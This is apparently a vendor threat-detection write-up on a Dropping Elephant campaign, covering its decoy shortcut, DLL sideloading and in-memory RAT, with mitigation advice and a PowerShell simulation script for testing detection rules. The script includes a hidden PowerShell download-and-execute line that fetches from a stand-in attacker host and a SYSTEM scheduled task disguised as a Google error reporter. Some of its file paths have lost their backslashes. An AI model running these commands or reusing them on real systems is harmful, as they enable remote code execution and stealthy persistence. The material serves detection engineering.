SOC Prime Bias: Critical

19 Jun 2026 07:55 UTC

Malware à la Mode: Inside Dropping Elephant’s Loader Chain

Author Photo
SOC Prime Team linkedin icon Follow
Malware à la Mode: Inside Dropping Elephant’s Loader Chain
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A sophisticated campaign attributed to Dropping Elephant uses China-themed decoy documents to deliver an updated, memory-resident remote access trojan. The intrusion relies on DLL sideloading through a legitimate Microsoft binary and the Donut shellcode loader to avoid disk-based detection. The final payload also uses advanced evasion methods, including control-flow flattening and runtime API reconstruction.

Investigation

Rapid7 researchers uncovered the threat during a proactive hunt that began with a malicious Windows shortcut masquerading as a PDF document. Their investigation followed the payload chain from initial staging on chinagreenenergy[.]org through DLL sideloading of APPWIZ.cpl to execution of an in-memory RAT. Code-level analysis with Diaphora confirmed a common lineage with earlier Dropping Elephant samples despite extensive reworking.

Mitigation

Defenders should prioritize behavioral detections, such as shortcut files launching PowerShell and suspicious payload staging in C:\Users\Public. Monitoring for scheduled tasks with unusual names and identifying DLL sideloading from unexpected directories is also important. In addition, endpoint defenses need memory-level visibility to catch tampering with AMSI, WLDP, and ETW.

Response

If this activity is detected, isolate affected systems immediately to disrupt further command-and-control traffic. Perform memory forensics to identify the injected RAT and inspect scheduled tasks for persistence. Network logs should also be reviewed for unauthorized HTTPS traffic to the known C2 domains and for any signs of file exfiltration.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands: The adversary aims to establish persistence and execute a downloader. To bypass standard email filters, they use a shortcut file named GRES3001.lnk that appears as a PDF. When clicked, it calls conhost.exe to run a PowerShell script. Simultaneously, they establish persistence by creating a scheduled task named GoogleErrorReport which is designed to run Fondue.exe from a public directory, masquerading as a legitimate Google error reporter to evade casual inspection.

  • Regression Test Script:

    # 1. Simulate the Shortcut/Conhost behavior
    # We simulate the execution of conhost.exe with the specific string in the command line
    Start-Process "conhost.exe" -ArgumentList "/c PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" 
    # Note: To strictly match the rule's 'CommandLine contains GRES3001.lnk', we simulate the process call as if it came from that file.
    # Since we can't easily spoof the parent process name in a simple script, we simulate the command line string expected.
    Write-Host "[!] Simulating GRES3001.lnk trigger..."
    $SimulatedCmd = "conhost.exe /c GRES3001.lnk PowerShell.exe -Command Write-Host 'Malware Loaded'"
    # In a real environment, the 'CommandLine' field in Sysmon would contain the target string.
    
    # 2. Simulate the Scheduled Task and Fondue.exe side-loading
    Write-Host "[!] Simulating GoogleErrorReport scheduled task..."
    New-Item -Path "C:UsersPublicFondue.exe" -ItemType File -Force
    Set-Content -Path "C:UsersPublicFondue.exe" -Value "Dummy Payload"
    
    $TaskName = "GoogleErrorReport"
    $Action = New-ScheduledTaskAction -Execute "C:UsersPublicFondue.exe"
    Register-ScheduledTask -Action $Action -TaskName $TaskName -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force
    
    Write-Host "[+] Simulation Complete. Check SIEM for alerts."
  • Cleanup Commands:

    # Remove the dummy malware binary
    Remove-Item -Path "C:UsersPublicFondue.exe" -Force
    
    # Remove the malicious scheduled task
    Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false
    
    Write-Host "[+] Cleanup Complete."